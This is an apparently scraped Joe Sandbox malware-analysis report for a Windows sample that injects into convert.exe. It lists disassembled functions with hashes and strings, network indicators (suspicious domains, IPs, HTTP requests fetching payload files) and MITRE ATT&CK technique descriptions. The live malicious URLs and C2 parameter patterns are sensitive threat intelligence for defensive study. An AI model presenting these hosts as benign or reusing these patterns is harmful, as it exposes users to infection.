0, xrefs: 0376B695
0, xrefs: 0376B66F
-, xrefs: 0376B650
+, xrefs: 0376B65A

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 824535462581cf7bbf626f59eed3b109ff18be68453657f30b8666b6dae93c9c
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: C181AF70E4524A9EDF25CE6AC8B17FEBBA6AF46310F1C415EDC61E7391C73498408B90

Function 0374F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0379031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 037902BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 037902E7

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 70d33ff9f76c2ea1a985bf84c23c04a6020ca9251552adc5c507520547b21a94
Instruction ID: 85f647467abf464cd61a3f44864e02b45f2c7d785b6737967d1d0021945404fd
Opcode Fuzzy Hash: 70d33ff9f76c2ea1a985bf84c23c04a6020ca9251552adc5c507520547b21a94
Instruction Fuzzy Hash: 24E1AD34618741DFEB25CF28D984B2AB7E4BF89314F180A5EF5A58B2E1D774E844CB42

Function 0375BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03797B7F
RTL: Resource at %p, xrefs: 03797B8E
RTL: Re-Waiting, xrefs: 03797BAC

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: dff4002efeeabc3d105b2f40d534b81b9742754b7e68858495291b6bf811d432
Instruction ID: 4d986b7cf10cdcb19e5dc5caf6ac94ad6a4b29db4a4bad1a4d6c5a3c2b7560f6
Opcode Fuzzy Hash: dff4002efeeabc3d105b2f40d534b81b9742754b7e68858495291b6bf811d432
Instruction Fuzzy Hash: 6441E2353007429FDB28DE29DC40B6AB7E5EF88710F140A1DFD5ADB680DBB0E8058B91

Function 0375B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0379728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03797294
RTL: Resource at %p, xrefs: 037972A3
RTL: Re-Waiting, xrefs: 037972C1

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 2983017de6a5b90baed94c7d61762814baf2e5af00cc347b883a57646f15cb77
Instruction ID: 05eebb15a65fa90a22702c9d2db439e0f53f0db84c9016260d32a128cb77f7b8
Opcode Fuzzy Hash: 2983017de6a5b90baed94c7d61762814baf2e5af00cc347b883a57646f15cb77
Instruction Fuzzy Hash: 75411F35710642AFDB28CE64DC81B6AB7B5FF84711F18061AFD55AB280DB60E812CBD1

Function 035C2BD0 Relevance: 6.3, Strings: 5, Instructions: 65COMMON

Download Yara Rule

Strings

r%., xrefs: 035C2BAB
gp, xrefs: 035C2C2C
max-, xrefs: 035C2BE7
r8ty, xrefs: 035C2C24
age=, xrefs: 035C2BEF

Memory Dump Source

Source File: 0000000B.00000002.2511513222.00000000035C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_35c0000_convert.jbxd

Similarity

API ID:
String ID: age=$gp$max-$r8ty$r%.
API String ID: 0-3945080911
Opcode ID: 24083b59099c80d4aafa9eed5699e11fa10219195b8ec1aa97d6218758027159
Instruction ID: 8ba2a8196ed26497261c95880aa3032210f4fcebe9e19b5e2035db634f7221fb
Opcode Fuzzy Hash: 24083b59099c80d4aafa9eed5699e11fa10219195b8ec1aa97d6218758027159
Instruction Fuzzy Hash: 6A1193240287844FD704EF94A44529ABBE0FBC830DF541E6CE88EDA262DA798645870B

Function 03767D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 03767E8B

Strings

-, xrefs: 03767DDD
+, xrefs: 03767DE8

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: c5c46c94d9345687531fd4e3ef3ffc5d67d9c80b44b9add3a836e4925d2cac48
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 8191D770E0024ADBDF28CE69C8A1AFEB7A9EF447A4F5C451AEC65E72C0D73489418B11

Function 03729126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 03729175
$, xrefs: 03729191

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: a37a47b1bb88f17b4af1dbc884d077009222ef355194bdaa165b44d56878af84
Instruction ID: bd737b350a210f06aeb9785bd3def364118904d994abac56e7ada4a9302534a0
Opcode Fuzzy Hash: a37a47b1bb88f17b4af1dbc884d077009222ef355194bdaa165b44d56878af84
Instruction Fuzzy Hash: 23812975D402699BDB21DF54CC44BEEB7B8AF49710F0445EAEA19B7281E7309E84CFA0

Function 037ACEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 037ACFBD

Strings

@4rw@4rw, xrefs: 037ACFD5, 037ACFDA, 037ACFF1
@, xrefs: 037ACF0A

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4rw@4rw
API String ID: 4062629308-2979693914
Opcode ID: 90451c9046291b4d9aed29f2377e0a9e2dca02593a55b5e3074798f26583ae8e
Instruction ID: 4a35301b5da766b4ee6f7c882381da84c2ed50112fca1d928831a60e69a40745
Opcode Fuzzy Hash: 90451c9046291b4d9aed29f2377e0a9e2dca02593a55b5e3074798f26583ae8e
Instruction Fuzzy Hash: FA41BF7A900618DFCB21DFA9C844AAEBBB8FF85B00F04466AE914DF255D774C901EB60

Analysis Process: nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exePID: 5904, Parent PID: 7644COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	36
Total number of Limit Nodes:	5

Executed Functions

Function 04B57615 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 663
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setsockopt.WS2_32(C7B351EA,0000FFFF,00001006,000000FF,00000004), ref: 04B57DC4

Strings

&un=, xrefs: 04B579F5, 04B579FA
&br=9, xrefs: 04B57A1B, 04B57A1E
dat=, xrefs: 04B5793B
80, xrefs: 04B57758

Memory Dump Source

Source File: 0000000D.00000002.2514005145.0000000004B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4b10000_nBalytGzlKEsLGhTwrqyRTGQJtkGfn.jbxd

Yara matches

Similarity

API ID: setsockopt
String ID: &br=9$&un=$80$dat=
API String ID: 3981526788-3709368510
Opcode ID: bc162973b7a3b280918483d1b266e2d2ce120e9f033497a4741f8c5aa65f982b
Instruction ID: 6722c02e55937bf8ab12e7ac607d240b4519eb3d3f496695c59ddfaa77ab6cc9
Opcode Fuzzy Hash: bc162973b7a3b280918483d1b266e2d2ce120e9f033497a4741f8c5aa65f982b
Instruction Fuzzy Hash: 354285B1A00305AFDB24DFA8C884BEEB7B9FF48344F14459DE91A9B255DB70B941CB90

Function 04B7A465 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

closesocket.WS2_32(04B57E60,04B788DC,?,?,04B57E60,?,C7B351EA), ref: 04B7A494

Memory Dump Source

Source File: 0000000D.00000002.2514005145.0000000004B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4b10000_nBalytGzlKEsLGhTwrqyRTGQJtkGfn.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 479954969279388b44c49519633430e6d20a85051580f16159365f5b5f0eb797
Instruction ID: ef77d7fd8a26b263faedefddee9b2877a9a3d05446b36af8c393beb90f1fcf4c
Opcode Fuzzy Hash: 479954969279388b44c49519633430e6d20a85051580f16159365f5b5f0eb797
Instruction Fuzzy Hash: 07E08C362006147FE620EF59DC04EABB7ACEFC9325F008859FE08A7201D631B91187F0

Source: www.jl884.vip	Virustotal: Detection: 7%			Perma Link
Source: http://www.firmshow.top/02nb/	Virustotal: Detection: 5%			Perma Link

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Code function: 4x nop then dec eax	0_2_00007FF7C19335BD
Source: C:\Windows\SysWOW64\convert.exe	Code function: 4x nop then xor eax, eax	11_2_03009720
Source: C:\Windows\SysWOW64\convert.exe	Code function: 4x nop then mov ebx, 00000004h	11_2_035C0548
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 4x nop then xor eax, eax	13_2_04B5B7B5

Source: Joe Sandbox View	IP Address: 203.161.43.228 203.161.43.228
Source: Joe Sandbox View	IP Address: 38.47.158.215 38.47.158.215

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source:	DNS query: www.cloudsoda.xyz
Source:	DNS query: www.d99qtpkvavjj.xyz

Source: global traffic	HTTP traffic detected: GET /assuence/litesolidCha/Footer.cli HTTP/1.1Host: investdirectinsurance.comConnection: close
Source: global traffic	HTTP traffic detected: GET /assuence/litesolidCha/Oszina.cli HTTP/1.1Host: investdirectinsurance.comConnection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: investdirectinsurance.com
Source: global traffic	DNS traffic detected: DNS query: www.jl884.vip
Source: global traffic	DNS traffic detected: DNS query: www.cloudsoda.xyz
Source: global traffic	DNS traffic detected: DNS query: www.d99qtpkvavjj.xyz
Source: global traffic	DNS traffic detected: DNS query: www.firmshow.top
Source: global traffic	DNS traffic detected: DNS query: www.jl800.vip
Source: global traffic	DNS traffic detected: DNS query: www.theridleysuk.co.uk

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9B1ZyhsFUq.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\9B1ZyhsFUq.exe.log

C:\Users\user\AppData\Local\Temp\-16743

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
9B1ZyhsFUq.exe

Function 00007FF7C1938CB0 Relevance: 2.4, APIs: 1, Instructions: 880
processCOMMON

Function 00007FF7C1939B41 Relevance: 1.7, APIs: 1, Instructions: 222
injectionCOMMON

Function 00007FF7C1939975 Relevance: 1.7, APIs: 1, Instructions: 199
memoryCOMMON

Function 00007FF7C1939D4D Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Function 00007FF7C193967E Relevance: 1.7, APIs: 1, Instructions: 192
threadCOMMON

Function 00007FF7C1939839 Relevance: 1.6, APIs: 1, Instructions: 142
threadCOMMON

Function 004176E3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 0042B253 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Function 010C2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Function 010C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Function 010C2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Function 00413D63 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Function 00417763 Relevance: 1.5, APIs: 1, Instructions: 44
libraryloaderCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
